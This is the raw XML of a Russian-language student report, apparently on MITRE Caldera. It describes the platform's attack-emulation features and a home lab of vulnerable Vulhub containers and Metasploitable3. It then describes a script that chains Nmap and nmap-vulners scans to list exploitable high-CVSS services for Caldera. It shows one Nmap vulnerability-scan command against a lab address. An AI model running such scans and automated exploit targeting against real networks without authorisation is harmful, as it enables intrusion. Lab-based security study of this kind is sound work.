        <w:t xml:space="preserve"> Mitre Caldera позволяет пользователям создавать и выполнять сценарии атак, основанные на известных TTP, испол</w:t>
      </w:r>
      <w:r>
        <w:t>ьзуемых киберугрозами. Это включает в себя эмуляцию фишинговых кампаний, эксплуатацию уязвимостей в приложениях, брутфорс аутентификации и другие типы атак.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Использование эксплоитов и уязвимостей</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Mitre Caldera обладает возможностью использовать различные </w:t>
      </w:r>
      <w:r>
        <w:t>эксплоиты для получения доступа к целевым системам. Это включает в себя известные уязвимости в операционных системах, прикладных программах, а также уязвимости в сетевых протоколах и сервисах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Мониторинг сетевой активности</w:t>
      </w:r>
      <w:r>
        <w:t>: Платформа позволяет пользователю</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отслеживать и анализировать сетевую активность, включая передачу данных, сетевые запросы и ответы, а также взаимодействие между </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>системами в сети. Это позволяет выявлять аномальные поведения и потенциальные атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Сбор и анализ данных</w:t>
      </w:r>
      <w:r>
        <w:t>: Mitre Caldera предос</w:t>
      </w:r>
      <w:r>
        <w:t>тавляет возможности для сбора, агрегации и анализа данных, собранных в процессе симуляции атак. Это включает в себя данные о сетевой активности, журналы событий, данные о процессах и многое другое. Анализ этих данных позволяет выявлять уязвимости и улучшат</w:t>
      </w:r>
      <w:r>
        <w:t>ь процессы обнаружения и реагирования на атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Распределенное выполнение задач</w:t>
      </w:r>
      <w:r>
        <w:t>: Mitre Caldera поддерживает распределенное выполнение задач, что позволяет распределить нагрузку на несколько агентов и систем, ускоряя процесс симуляции атак и анализа результ</w:t>
      </w:r>
      <w:r>
        <w:t>атов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t xml:space="preserve">В целом, возможности Mitre Caldera обеспечивают пользователям мощный инструмент для моделирования и анализа кибератак, что помогает улучшить защиту информационных систем и повысить готовность кибербезопасности. Благодаря широкому спектру </w:t>
      </w:r>
      <w:r>
        <w:t>функциональности и гибкости настройки, платформа Mitre Caldera становится незаменимым ресурсом для специалистов по информационной безопасности, стремящихся повысить уровень защиты своих организаций от киберугроз.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="__RefHeading___Toc911_3518165554"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>Adversary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>Mitre Caldera предоставляет поль</w:t>
      </w:r>
      <w:r>
        <w:t>зователям доступ к обширной библиотеке сценариев атак, основанных на поведении и тактиках реальных киберугроз. Эти атакующие, или адверсары, моделируют типичные действия, которые могут быть использованы злоумышленниками для вторжения в информационные систе</w:t>
      </w:r>
      <w:r>
        <w:t>мы и проведения различных видов кибератак. Рассмотрим основные аспекты атакующих в Mitre Caldera:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Библиотека TTP</w:t>
      </w:r>
      <w:r>
        <w:t>: Платформа содержит обширную библиотеку тактик, техник и процедур (TTP), используемых киберугрозами при проведении атак. Эта библиотека включае</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">т в себя множество сценариев, от </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>обычных тактик фишинга и атаки на учетные записи до продвинутых методов обхода обнаружения и антивирусных средств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Реалистичное поведение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Атакующие в Mitre Caldera эмулируют реалистичное поведение злоумышленников, включая </w:t>
      </w:r>
      <w:r>
        <w:t>выбор целей, последовательность действий и использование обходных методов для маскировки своей активности. Это позволяет пользователям анализировать и сопоставлять поведение атакующих с реальными случаями атак.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Множество типов атак</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Библиотека атакующих в </w:t>
      </w:r>
      <w:r>
        <w:t>Mitre Caldera включает различные типы атак, такие как внедрение зловредного программного обеспечения, использование уязвимостей в приложениях, а также атаки на учетные записи и инфраструктуру сети. Это позволяет пользователям моделировать разнообразные сце</w:t>
      </w:r>
      <w:r>
        <w:t>нарии атак и анализировать их воздействие на целевые системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Гибкость конфигурации</w:t>
      </w:r>
      <w:r>
        <w:t>: Mitre Caldera предоставляет возможность настройки параметров атакующих, что позволяет пользователям адаптировать сценарии атак под свои конкретные потребности и цели тести</w:t>
      </w:r>
      <w:r>
        <w:t>рования. Это включает выбор конкретных TTP для эмуляции, настройку параметров атаки и управление режимом выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Обучение и анализ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Пользователи могут использовать атакующих в Mitre Caldera для обучения персонала по безопасности, а также для анализа и </w:t>
      </w:r>
      <w:r>
        <w:t>улучшения средств обнаружения и реагирования на атаки. Проведение симуляций атак с использованием различных сценариев позволяет оценить эффективность защитных мер и разработать стратегии улучшения безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>В целом, атакующие в Mitre Caldera играют важ</w:t>
      </w:r>
      <w:r>
        <w:t>ную роль в процессе моделирования и анализа кибератак, помогая пользователям понять сущность угроз и разработать эффективные меры защиты. Благодаря широкому спектру сценариев атак и гибкости настройки, Mitre Caldera предоставляет пользователям мощный инстр</w:t>
      </w:r>
      <w:r>
        <w:t>умент для улучшения кибербезопасности своих организаций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="__RefHeading___Toc913_3518165554"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Operations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>Mitre Caldera предоставляет пользователю мощные средства для планирования, выполнения и анализа симуляций кибератак, известных как операции. Операции в Mitre Caldera представляют собой ком</w:t>
      </w:r>
      <w:r>
        <w:t>плексный процесс, который включает в себя не только выполнение сценариев атак, но и анализ результатов, обучение персонала по безопасности и разработку стратегий улучшения защиты. Рассмотрим ключевые аспекты операций в Mitre Caldera:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Планирование операций</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Процесс начинается с планирования операции, включая выбор целевых систем, определение целей тестирования и выбор сценариев атак. Пользователь может выбирать из богатой библиотеки предварительно созданных сценариев или создавать собственные сценарии в соот</w:t>
      </w:r>
      <w:r>
        <w:t>ветствии с конкретными потребностями и целями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Развертывание агентов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: После планирования операции пользователь разворачивает агентов Mitre Caldera на целевых системах, что позволяет платформе имитировать поведение киберугроз и выполнять выбранные сценарии </w:t>
      </w:r>
      <w:r>
        <w:t>атак. Агенты работают на различных уровнях системы, от сетевого до уровня приложений, обеспечивая широкий спектр возможностей для симуляции атак.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Выполнение симуляций атак</w:t>
      </w:r>
      <w:r>
        <w:t>: После развертывания агентов Mitre Caldera выполняет выбранные сценарии атак на целе</w:t>
      </w:r>
      <w:r>
        <w:t>вых системах. Пользователь может наблюдать за выполнением операции и отслеживать сетевую активность, действия агентов и реакцию целевых систем на проводимые атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Анализ результатов</w:t>
      </w:r>
      <w:r>
        <w:t>: После завершения операции пользователь проводит анализ результатов, собр</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">анных в процессе симуляции атак. Это включает в себя оценку эффективности защитных мер, обнаружение слабых мест в инфраструктуре безопасности и выявление потенциальных угроз. </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Анализ результатов позволяет пользователям принимать информированные решения по у</w:t>
      </w:r>
      <w:r>
        <w:t>лучшению защиты информационных систем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Обучение и улучшение</w:t>
      </w:r>
      <w:r>
        <w:t>: Полученные в результате операции данные могут быть использованы для обучения персонала по безопасности, а также для улучшения процессов обнаружения и реагирования на кибератаки. Разработка страте</w:t>
      </w:r>
      <w:r>
        <w:t>гий улучшения безопасности на основе анализа результатов помогает повысить готовность кибербезопасности организации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>В целом, операции в Mitre Caldera представляют собой комплексный процесс, который помогает пользователям моделировать, анализировать и улуч</w:t>
      </w:r>
      <w:r>
        <w:t>шать защиту информационных систем от киберугроз. Благодаря широким возможностям планирования, выполнения и анализа симуляций атак, Mitre Caldera становится мощным инструментом для повышения кибербезопасности организаций. Его возможности по эмуляции различн</w:t>
      </w:r>
      <w:r>
        <w:t>ых атак и анализа их последствий помогают повысить эффективность защитных мер и снизить риск инцидентов безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="__RefHeading___Toc1616_3290770187"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Практическая часть выполнена на собственной инфраструктуре. В качестве аппаратной базы использовался персональный ко</w:t>
      </w:r>
      <w:r>
        <w:t>мпьютер со следующей конфигурацией:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU:  AMD Ryzen 7 3700X</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>GPU: AMD Radeon RX6800XT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>ОЗУ</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: DDR4 64Gb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>ПЗУ</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: NVMe SSD 1Tb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ОС: Ubuntu 22.04 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Работа производилась как непосредственно на рабочей станции так и с использованием RDP по VPN туннелям WireGuard </w:t>
      </w:r>
      <w:r>
        <w:t>и OpenVPN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="__RefHeading___Toc1618_3290770187"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:t>Лабораторная инфраструктура</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Ubuntu была выбрана в качестве базовой ОС, так как обкспечивает достаточно простую работу со скриптами Vagrant и Ansible, необходимыми для развёртывания уязвимых машин.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>В качестве средства виртуализации выбран Virtu</w:t>
      </w:r>
      <w:r>
        <w:t>alBox простое, эффективное и бесплатное средство с функионалом достаточным для целей данной работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="__RefHeading___Toc814_2337190046"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">В качестве атакующей машины выбран дистрибутив Kali Linux как полностью подходящий под задачи и уже имеющий оба используемых в работе приложения Nmap </w:t>
      </w:r>
      <w:r>
        <w:t>и Калдера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Однако представленная в репозитории Кали Калдера имеет устаревшую версию с недостаточной надёжностью работы. В связи с чем была произведена установка актуальной версии 5.0.0 из официального репозитория на GutHub: https://github.com/mitre/calder</w:t>
      </w:r>
      <w:r>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:bookmarkStart w:id="15" w:name="__RefHeading___Toc1626_3290770187"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Для выполнения сканирования на уязвимости утилитой Nmap были установлены дополнительные скрипты из репозитория на GitHub: https://github.com/vulnersCom/nmap-vulners.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="__RefHeading___Toc1632_3290770187"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t>Тестовые машины и сервисы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Vulhub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — представляет из себя набор Докер контейнеров с зав</w:t>
      </w:r>
      <w:r>
        <w:t>едомо уязвимыми сервисами. В работе использовались следующие сервисы: Drupal, Jira, Apache-Druid, WordPress, MySQL. Для поднятия Докер контейнеров использовалась отдельная виртуальная машина с Linux Mint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="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796540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097" w:rsidRDefault="00C26DD2">
      <w:bookmarkStart w:id="17" w:name="__RefHeading___Toc1634_3290770187"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Виртуальная машина с </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploitable3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">от </w:t>
      </w:r>
      <w:r>
        <w:t>создателей Meta Sploit Framework Rapid7 использовалась в качестве второй тестовой машины. Машина имеет достаточно широкий перечень уязвимостей и зарекомендовала себя как отличная обучающая платформа для пентеста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="__RefHeading___Toc1636_3290770187"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Работа скрипта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="694"/>
      </w:pPr>
      <w:r>
        <w:t>Для запуска скрипта необхо</w:t>
      </w:r>
      <w:r>
        <w:t>димо установить Калдеру и Nmap, разместить файл  ScanDLCalOp.py в корневой папке Калдеры. В качестве вводных данных скрит ScanDLCalOp.py принимает один параметр — сканируемую подсеть или конкретный IP адрес. Перед запуском скрипта необходимо выключить Калд</w:t>
      </w:r>
      <w:r>
        <w:t>еру, если она запущена в фоне, как и будет после работы скрипта, то для этого можно воспользоваться утилитой Htop и остановить процесс server.py Калдеры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="__RefHeading___Toc1638_3290770187"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t>Namp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Для оптимизации работы утилиты Nmap сканирование производится в несколько этапов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>На первом эта</w:t>
      </w:r>
      <w:r>
        <w:t>пе осуществляется быстрое сканирование доступных в подсети хостов утилитой Nmap и из выдачи формируется их список., из списка исключается IP машины с которой производится сканирование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Далее производится полное сканирование всех портов на найденных хостах</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и формируется массив пар «IP»:«port».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2"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3" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>84455</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>15240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5525770" cy="3470275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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1553" t="30454" r="56541" b="32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097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>На третьем этапе осуществляется сканирование по сформированному ранее списку с определением запущенных на них служб, и при помощи установленного NSE скрипта nmap-vulners осуществляется определение уязвимостей запущ</w:t>
      </w:r>
      <w:r>
        <w:t>енной службы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Команда</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sV -p8080 --script nmap-vulners/ 192.168.56.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US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5" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-38735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5915660" cy="3234690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"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1877" t="19045" r="36514" b="28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097" w:rsidRDefault="00C26DD2">
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Из выдачи работы Nmap-vulners извлекаюся следующие параметры:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>- номер уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>- CVSS уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>- ссылка на описание уязвимости или эксплойт</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t xml:space="preserve">- строка *EXPLOIT* определяющая </w:t>
      </w:r>
      <w:r>
        <w:t>наличие эксплойта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Далее для уязвимостей имеющих эксплойт и CVSS более 7 формируется массив словарей содержащий: IP, port, VulNum, CVSS, URL. Из полученных словарей начинает формироваться файл Vulns.json с которым производится дальнейшая работа.</w:t>
      </w:r>
